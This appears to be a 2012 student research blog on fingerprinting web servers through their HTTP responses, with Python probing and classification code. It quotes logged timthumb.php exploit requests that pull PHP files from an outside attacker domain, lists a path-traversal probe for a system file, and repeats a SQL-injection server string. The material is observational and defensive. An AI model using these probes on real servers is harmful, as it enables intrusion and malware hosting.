Or looking for known, fixed vulnerabilities on servers that should know better (and several that shouldn't)
 

Wrapping Up

November 30th, 2012 by Tad

We have now finished our analysis and are pulling the final details together.  We feel that we have some significant results to share – we were able to predict server types with a fairly high degree of accuracy based on responses to our queries, although our data was not fine-grained enough to distinguish between different versions of the same server.  We are working on summarizing the various findings already mentioned in the blog and putting things together into a final document that we will share here when it is complete.



Ongoing Analysis

November 26th, 2012 by Tad

In addition to accomplishing our stated goal of eating turkey, Martha and I made some additional progress last week. After a futile struggle to make use of the Weka data mining software, I returned to Python and produced a script that uses Bayesian probability to calculate the likelihood of any given server type given a particular response.
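The core of that calculation can be sketched as follows. The feature names and training counts below are invented for illustration; the real script derives its counts from our gathered dataset.

```python
# Hypothetical training counts: how often each (feature, value) pair
# was observed in responses from each known server type.
counts = {
    "Apache": {("status_trace", "200"): 40, ("status_trace", "405"): 10},
    "nginx":  {("status_trace", "200"): 5,  ("status_trace", "405"): 45},
}
totals = {"Apache": 50, "nginx": 50}  # responses seen per server type

def likelihoods(observed):
    """P(server | response) via Bayes' rule with a uniform prior,
    using Laplace smoothing so an unseen feature doesn't zero out a server."""
    scores = {}
    for server, total in totals.items():
        p = 1.0
        for feature in observed:
            seen = counts[server].get(feature, 0)
            p *= (seen + 1) / (total + 2)
        scores[server] = p
    norm = sum(scores.values())
    return {s: p / norm for s, p in scores.items()}

probs = likelihoods([("status_trace", "405")])
```

Here a 405 response to TRACE weighs heavily toward nginx, since that pairing dominates its (hypothetical) training counts.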

Building on that, we completed an analysis program that predicts the server type of any given site based on the responses that the server gives to our queries. Although more analysis remains to be done, the initial results look promising. In most cases our software agrees with the reported server type, but in many cases, the results are different. For example, most servers identifying themselves as IBM_HTTP_SERVER were recognized as Apache. At first this appeared to be a weakness in the software, but it turns out that IBM HTTP Server is, in fact, rebranded Apache, so this result showed that the program was behaving correctly.

Sites that refused to provide a server type were generally identified with one of the major server vendors. More interesting is a significant minority of sites that report using one of the major servers, but which are identified by our program as using another. Do these cases represent errors on the part of our analysis, or do they represent a pattern of some site administrators intentionally providing false version strings? Given the number of obviously false version strings, it seems likely that, at least in some cases, the latter is taking place.

This week, we will continue our analysis. Stay tuned for more results!



Unusual Server Responses

November 17th, 2012 by Tad

Just for fun, I thought I would post a few items to show the breadth of the servers that we surveyed.

  • http://www.skattelister.no responded to our relative request with status 418 from IETF RFC 2324 (§2.3.2), indicating that it is, in fact, a teapot.  We find this response somewhat irregular, as it is only supposed to be returned in response to a brew request for coffee.
  • Mailmta.com, running the Varnish server, reports status code 770 for all requests.  As this is one of the area codes for Atlanta, it makes me feel right at home.
  • Boisestate.edu is running the commodore64-HTTPD/1.1.  While we understand this to be a very efficient implementation, it may also point to the levels of education funding in Idaho.
  • CQNews.net is running server “unknow.”  Hopefully this does not reflect the purpose of their news room.
  • http://www.alittihad.co.ae runs on Nintendo.
  • TravelingLuck.com runs on what is reported as “My Arse.”  Our condolences to the webmaster.
  • We have already mentioned reddit.com’s SQL injection string.
  • The Orthodox Jewish web site vosizneias.com has some high-powered security.  Their server string? “In Hashem We Trust.”
  • Citibank Thailand runs their insecure server on “unkown” software
  • Expensify.com reports “All your base are belong to us”.  Hopefully the meme doesn’t express how they view your data.
  • LoveMoney.com is also holding tight on expenses.  They are running on Windows/3.11
  • and that’s only the tip of the iceberg!


Early Results

November 17th, 2012 by Tad

After 10 days of execution, we gathered responses from the Alexa top 100,000 servers. We also created a dataset from the bottom 10,000 in the Alexa top 1M, which gives us a sample of smaller web sites to analyze.

Today, we began our analysis work in earnest. In addition to statistical data on the prevalence of various web servers and versions, we found some surprising information regarding the behavior of servers when asked to provide an HTML document as a CSS style sheet. Of the top 100k servers, nearly 200 exhibited the behavior that, when asked for an HTML document as a CSS style sheet, they served up the HTML document – and reported its MIME type as CSS. This would defeat any browser-side security features aimed at preventing cross-origin CSS attacks through MIME type enforcement.
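A check for this behavior can be sketched as follows. The request shape is an assumption for illustration (asking for a page while advertising `text/css` in the Accept header); our actual spider records the full response headers and classifies them offline.

```python
import http.client

def mislabeled_as_css(content_type, body):
    """True when a body that looks like HTML is reported as text/css."""
    looks_like_html = b"<html" in body.lower() or b"<!doctype" in body.lower()
    return looks_like_html and content_type.lower().startswith("text/css")

def serves_html_as_css(host, path="/"):
    """Ask for a page while claiming to want CSS, and flag servers that
    label the HTML body as text/css anyway."""
    conn = http.client.HTTPConnection(host, timeout=10)
    try:
        conn.request("GET", path, headers={"Accept": "text/css"})
        resp = conn.getresponse()
        return mislabeled_as_css(resp.getheader("Content-Type", ""),
                                 resp.read(512))
    finally:
        conn.close()
```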

Most disturbingly, at least one of the sites that exhibited this behavior is a well-known site that handles financial information, while others involve users logging in to provide other potentially sensitive information, including a site used primarily for political purposes.

Ongoing analysis will produce more interesting results. Stay tuned to this blog to find out more.



A quick update

November 11th, 2012 by Tad

We have now completed gathering the first dataset of the Alexa top 10,000. We are beginning analysis on that set, and are also in the process of gathering data from the Alexa top 100,000. That will allow us to apply the techniques that we develop on a larger dataset, as well as look for differences between the more popular (and presumably more actively maintained) sites, and ones that are somewhat less so. We will still need to gather data from the “bottom 10,000” and embedded servers to get a fuller picture of what is out there on the web today.



Some real progress

November 6th, 2012 by Tad

Over the last weekend, Martha and I added some features to our spider that will enable it to gather the information needed for our analysis.  We expanded the spider to create a variety of different requests, allowing us to compare responses from different servers and compute a unique “fingerprint” for different server configurations.   At the present moment, I am running the spider on the Alexa Top 10,000 to get a big enough dataset to do some initial analysis and to begin to identify some of the potential security weaknesses that may be out there “in the wild.”

Here are the requests that the current spider makes against each server:

  • An ordinary get request against the root URL
  • A partial get request of 50 bytes against the root URL
  • A conditional get request for pages modified after a future date against the root URL
  • A head request against the root URL
  • An options request
  • A trace request against the root URL
  • A request for the root URL as a CSS stylesheet
  • A request for robots.txt as a CSS stylesheet
  • A request for a relative URL below the root directory
  • A request for the favicon
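As a sketch, the probe set above can be written down as a list of (method, path, headers) tuples. The specific values below (the Range size, the future date, the relative path) are illustrative stand-ins for what the spider actually sends.

```python
def probe_requests():
    """The probe set described above, as (method, path, headers) tuples.
    Header values here are illustrative stand-ins."""
    future = "Wed, 01 Jan 2014 00:00:00 GMT"  # safely in the future as of 2012
    return [
        ("GET",     "/",            {}),                             # ordinary get
        ("GET",     "/",            {"Range": "bytes=0-49"}),        # partial get, 50 bytes
        ("GET",     "/",            {"If-Modified-Since": future}),  # conditional get
        ("HEAD",    "/",            {}),
        ("OPTIONS", "*",            {}),
        ("TRACE",   "/",            {}),
        ("GET",     "/",            {"Accept": "text/css"}),         # root as CSS
        ("GET",     "/robots.txt",  {"Accept": "text/css"}),         # robots.txt as CSS
        ("GET",     "/../",         {}),                             # relative URL below root
        ("GET",     "/favicon.ico", {}),
    ]
```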

For each of these requests, we record the following fields:

  • The server version string
  • The response content type
  • The date of the response
  • The request method
  • The request URL
  • The response URL (often different due to redirects)
  • The request headers
  • The complete response headers
  • The reported content length
  • The actual length of the body (although there may be some character encoding issues that make our representation inaccurate)
  • The response status code

We have also prepared some analysis software in Python that will catalog the different responses given by servers with the same server id string.  This may help us to identify servers sending a false version string, as well as distinguish different configurations among servers.
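The cataloging step amounts to grouping response fingerprints by server string. A minimal sketch (the record fields here are invented for illustration):

```python
from collections import defaultdict

def catalog(records):
    """Group response fingerprints by the reported server string, so that
    differing fingerprints under one id (or identical fingerprints under
    different ids) stand out."""
    by_server = defaultdict(set)
    for rec in records:
        by_server[rec["server"]].add(rec["fingerprint"])
    return by_server

# Illustrative records: a fingerprint is a tuple of response features.
records = [
    {"server": "Apache/2.2", "fingerprint": ("200", "405", "text/html")},
    {"server": "Apache/2.2", "fingerprint": ("200", "405", "text/html")},
    {"server": "nginx",      "fingerprint": ("200", "405", "text/html")},
]
groups = catalog(records)
```

A server string mapping to many distinct fingerprints suggests varied configurations; one fingerprint shared across unrelated server strings suggests a falsified id.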

We are looking forward to continuing with our analysis, and seeing what meaningful data we are able to extract from our results.



First Steps

October 20th, 2012 by Tad

So we now have a primitive spider working!  You can see our code, which uses the Scrapy toolkit, at https://github.com/tbook/comp527-serversurvey.  It is pretty ugly at this point, but hopefully we will have something nice by the end of the semester.

We made an initial attempt to crawl the Alexa top 500 and gather some basic data from the server headers.  You can see a survey of our initial results here.

Discovering all of the interesting headers sent back by the servers that we encountered prompted a slight change in our methodology – we will log all server headers, which will allow us to assemble a fairly complete directory of what headers are in use, and use them to classify servers.  We will also examine the date stamps to survey how many servers have the date correctly configured.

Some initial insights:

  • It seems that many servers are (understandably) guarded about sharing version information.  Many servers don’t give the version, and some don’t even share the name of the server.  Several return helpful strings such as “server” or “confidential.”
  • There is quite a variety of servers “in the wild.”  Apache has the largest share, but we observed the following other servers, as well: aris, BWS, GSE, gws, IBM, lighttpd, Microsoft-IIS, nginx, Netscape, PWS, Sun-Java-System-Web-Server, Tengine, and others.
  • Reddit.com seems to be trying a SQL exploit.  Their server string is: “‘; DROP TABLE servertypes; –“
  • Roughly 3/4 of servers provide charset information, which varies widely, with UTF-8 being the most common, but ISO-8859-1, GB2312, GBK, windows-1251, windows-1256, EUC-JP, EUC-KR, Shift_JIS, and Big5 also appearing.  gsmarena.com uses “None” for its charset, apparently giving you the freedom to interpret their content in the way that you find personally most satisfying.
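Tallying the declared charsets is a one-pass count over the recorded Content-Type headers. A minimal sketch:

```python
from collections import Counter

def charset_counts(content_types):
    """Tally declared charsets from Content-Type header values; headers
    without a charset parameter are counted under None."""
    tally = Counter()
    for ctype in content_types:
        charset = None
        for part in ctype.split(";")[1:]:
            key, _, value = part.strip().partition("=")
            if key.lower() == "charset":
                charset = value.strip('"').lower() or None
        tally[charset] += 1
    return tally

counts = charset_counts([
    "text/html; charset=UTF-8",
    "text/html; charset=iso-8859-1",
    "text/html",
])
```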

That’s where we are right now.  Look for more updates in the coming weeks!



The HTTP Protocol

October 10th, 2012 by Tad

I have been looking over the HTTP Protocol version 1.1 (http://www.w3.org/Protocols/rfc2616/rfc2616.html) in order to try to get a sense of what parameters we should measure.  The first thing that I have observed is that the data that the server sends back depends on how we make the request.  Here are some examples from the Rice web server:

With no protocol specified, no headers are returned:

tbook@Athanasius:~$ telnet www.rice.edu 80
Trying 128.42.204.11...
Connected to www.netfu.rice.edu.
Escape character is '^]'.
GET /robots.txt
# Robot-exclusion file for chico.

With HTTP/1.0, we get a variety of headers:

GET /robots.txt HTTP/1.0
HTTP/1.1 200 OK
Date: Wed, 10 Oct 2012 19:30:51 GMT
Server: Apache/2.2.12 (Unix)
Last-Modified: Thu, 27 May 2004 16:39:15 GMT
ETag: "2aa0f0-73f-3db6aa1a392c0"
Accept-Ranges: bytes
Content-Length: 1855
Vary: Accept-Encoding
X-Forwarded-Server: WWW1
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/plain
# Robot-exclusion file for chico.

With HTTP/1.1, we get an error (as expected) on our incomplete request:

GET /robots.txt HTTP/1.1
HTTP/1.1 400 Bad Request
Date: Wed, 10 Oct 2012 19:31:59 GMT
Server: Apache/2.2.12 (Unix)
Vary: Accept-Encoding
Content-Length: 226
Cneonction: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

If we give a complete request, we receive (nearly) the same headers:

telnet> toggle crlf
Will send carriage returns as telnet <CR><LF>.
telnet> open www.rice.edu 80
Trying 128.42.204.11...
Connected to www.netfu.rice.edu.
Escape character is '^]'.
GET /robots.txt HTTP/1.1
User-Agent: Telnet
Host: www.rice.edu
Accept: text/html
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 10 Oct 2012 20:04:41 GMT
Server: Apache/2.2.12 (Unix)
Last-Modified: Thu, 27 May 2004 16:39:15 GMT
ETag: "2aa0f0-73f-3db6aa1a392c0"
Accept-Ranges: bytes
Content-Length: 1855
Vary: Accept-Encoding
X-Forwarded-Server: WWW1
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/plain
# Robot-exclusion file for chico.

The Accept field seems to be ignored:

GET /robots.txt HTTP/1.0
Accept: text/html
HTTP/1.1 200 OK
Date: Wed, 10 Oct 2012 19:44:00 GMT
Server: Apache/2.2.12 (Unix)
Last-Modified: Thu, 27 May 2004 16:39:15 GMT
ETag: "2aa0f0-73f-3db6aa1a392c0"
Accept-Ranges: bytes
Content-Length: 1855
Vary: Accept-Encoding
X-Forwarded-Server: WWW1
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/plain
# Robot-exclusion file for chico.

Other parts of the protocol seem not to be implemented:

Connected to www.netfu.rice.edu.
Escape character is '^]'.
OPTIONS
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
 "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Server error!</title>
...
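These telnet sessions can also be scripted. Here is a minimal sketch using a raw socket, so that responses to minimal or malformed requests can be captured exactly as the server sends them (an HTTP library would normalize or reject such requests):

```python
import socket

def raw_request(host, request, port=80, timeout=10):
    """Send a raw HTTP request string, exactly as typed in the telnet
    sessions above, and return everything the server sends back."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request.encode("ascii"))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:  # server closed the connection
                break
            chunks.append(data)
    return b"".join(chunks)

# e.g. the HTTP/1.0 probe from above:
# raw_request("www.rice.edu", "GET /robots.txt HTTP/1.0\r\n\r\n")
```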

Here is an initial list of some things we may want to test:

  • HTTP Version
  • Content type
  • Character set
  • Partial and conditional gets
  • Accept
  • Expect
  • TE (Transfer Encoding request)
  • Upgrade
  • HTTP GET / HEAD / OPTIONS / TRACE
  • Response of servers to various / malformed requests (both HTTP 1.0 and 1.1)
  • Behavior when a relative URL is requested; e.g., GET /../etc/passwords

Other things would be interesting to test, but probably impractical, as they would require knowing a path to a resource of the appropriate type (which may not exist on the server):

  • Content Coding
  • Transfer Coding
  • HTTP PUT / POST / DELETE



Some Historical Data

October 10th, 2012 by Tad

I recently came across some historical data on server versions and updates that may be useful for our project.  In a survey of drive-by downloads (Niels Provos, Panayiotis Mavrommatis, Moheeb Rajab, and Fabian Monrose, “All Your iFrames Point to Us,” 17th USENIX Security Symposium, San Jose, CA, Aug. 2008), the authors included the following data regarding some servers as of mid-2008:

Server software    Count     Unknown   Up-to-date   Old
Apache              55,088   26.5%     35.5%        38%
Microsoft IIS      113,905   n/a       n/a          n/a
Unknown             12,706   n/a       n/a          n/a

This data covers only servers that served as landing sites for malware distribution, so it can’t be taken as representative of web servers generally. Still, it provides a snapshot of the servers that were open to exploits at the time.



We aren’t the only ones surveying web servers!

October 8th, 2012 by Tad

Today, I had an interesting reminder that we are not the only ones surveying web servers. I was looking at the server logs for librivox.bookdesign.biz, a server that provides a web interface into the database that I use for my LibriVox AudioBooks android app.  As it turns out, there were a few interesting requests that produced 404 errors.  Here they are, below:

184.107.145.18 - - [05/Oct/2012:08:42:27 -0700] "GET /wp-content/themes/aquitaine/lib/custom/timthumb.php?src=http://blogger.com.arztree.com/idss.php HTTP/1.1"
404 0 - "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "librivox.bookdesign.biz" ms=3 cpu_ms=0
184.107.145.18 - - [05/Oct/2012:08:42:25 -0700] "GET /wp-content/themes/aquitaine/lib/custom/timthumb.php?src=http://blogger.com.arztree.com/petx.php HTTP/1.1"
404 0 - "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "librivox.bookdesign.biz" ms=4 cpu_ms=0 

As it turns out, timthumb.php is a WordPress image-resizing utility with a security vulnerability that allows arbitrary file uploads.  You can read about the weakness on the Sucuri blog.  Of course, it’s no surprise that malicious agents are surveying web servers for vulnerabilities.  It’s just interesting to see it happening in practice.  Had my server used the offending library, I could now be hosting drive-by downloads for some botnet.
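Spotting probes like the ones above is a simple pattern match over the access log. A minimal sketch (the regular expression is an illustrative guess at what distinguishes these requests, not a complete signature):

```python
import re

# Flag requests for timthumb.php that pass a remote URL in the src
# parameter, as in the log lines above.
TIMTHUMB_PROBE = re.compile(r'GET\s+\S*timthumb\.php\?src=https?://',
                            re.IGNORECASE)

def suspicious_lines(log_lines):
    """Return the access-log lines that look like timthumb upload probes."""
    return [line for line in log_lines if TIMTHUMB_PROBE.search(line)]

logs = [
    '184.107.145.18 - - [05/Oct/2012:08:42:27 -0700] "GET /wp-content/themes/'
    'aquitaine/lib/custom/timthumb.php?src=http://blogger.com.arztree.com/'
    'idss.php HTTP/1.1" 404 0',
    '10.0.0.1 - - [05/Oct/2012:09:00:00 -0700] "GET /index.html HTTP/1.1" 200 1234',
]
hits = suspicious_lines(logs)
```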

I didn’t take the time to thoroughly investigate 184.107.145.18 or arztree.com (the IP address points to a server hosted by iweb.com in Canada, and the domain is registered in Taiwan), as I think it is safe to assume that the trail of any potential attacker will likely be well covered.  Still, the fact of the probing is a reminder that our survey will, in some way, mirror the efforts of various agents looking for weaknesses in web infrastructure.